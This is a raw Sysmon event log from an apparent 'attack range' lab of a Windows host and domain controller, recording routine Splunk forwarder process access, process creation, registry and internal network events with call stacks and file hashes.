10341000x8000000000000000224190Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:48.879{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1B60-6216-8305-000000003902}300C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000224189Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:48.879{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1B60-6216-8305-000000003902}300C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000224188Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:48.880{4F8D34B0-1B60-6216-8305-000000003902}300C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000300430Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:45.806{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local58964-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local445microsoft-ds 354300x8000000000000000300429Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:45.806{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local58964-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local445microsoft-ds 23542300x8000000000000000224219Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:49.957{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97F42B72F6ACE8932C87E61628C64C0F,SHA256=22DA2782ED99EA0F9E3BCAB9ABB38627A81626E6A2A22DE379E073D8B39D5AB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300433Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:49.604{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1B187FC872AA77D23EFE31522A01280,SHA256=FF2736BD039B4AEC3EFE71C47C581F2C1BF8198B7D2502E6C51D18368404D191,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000224218Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:49.895{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=481AFCEF5219FE1C98642076FF84B825,SHA256=A54E3EB972D527C63261A2DC70AEC576D4BBCC48C6BC66454B7E98297254363B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000224217Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:49.816{4F8D34B0-1B61-6216-8405-000000003902}7883488C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224216Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:49.551{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1B61-6216-8405-000000003902}788C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224215Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:49.551{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224214Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:49.551{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224213Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:49.551{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224212Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:49.551{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224211Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:49.551{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224210Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:49.551{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224209Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:49.551{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224208Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:49.551{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224207Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:49.551{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224206Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:49.551{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1B61-6216-8405-000000003902}788C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000224205Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:49.551{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1B61-6216-8405-000000003902}788C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000224204Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:49.552{4F8D34B0-1B61-6216-8405-000000003902}788C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000224203Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:46.401{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51835-false10.0.1.12-8089- 10341000x8000000000000000224202Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:49.067{4F8D34B0-1B60-6216-8305-000000003902}3002816C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000300432Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:47.513{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local58965-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000224221Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:50.973{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B454756B0ABE8C0DB19D3B2E5DA00E42,SHA256=417483D4FD4D886814CFDCDBEF4688EB7A02A7E4063F640253F1D6947BBE25FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300434Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:50.628{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=201133CD0006D2957D183D7529856661,SHA256=E97CE4B69FE6F6C4EC34DA0A37808F4F1D67AAFE26B2A9AD174B8D6D223619F6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000224220Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:47.666{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51836-false10.0.1.12-8000- 13241300x8000000000000000300436Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:32:51.960{C8EA50B7-F11F-6215-1200-000000003802}8C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d828a9-0x17b2d747) 23542300x8000000000000000300435Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:51.645{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=251025581BA3638BD5B0231A1746DCBE,SHA256=90E306E201F754AA46426F3CF449A92F4BD0EF979C4FBF3288978BC0D34B8913,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000224234Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:51.301{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1B63-6216-8505-000000003902}3060C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224233Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:51.301{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224232Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:51.301{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224231Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 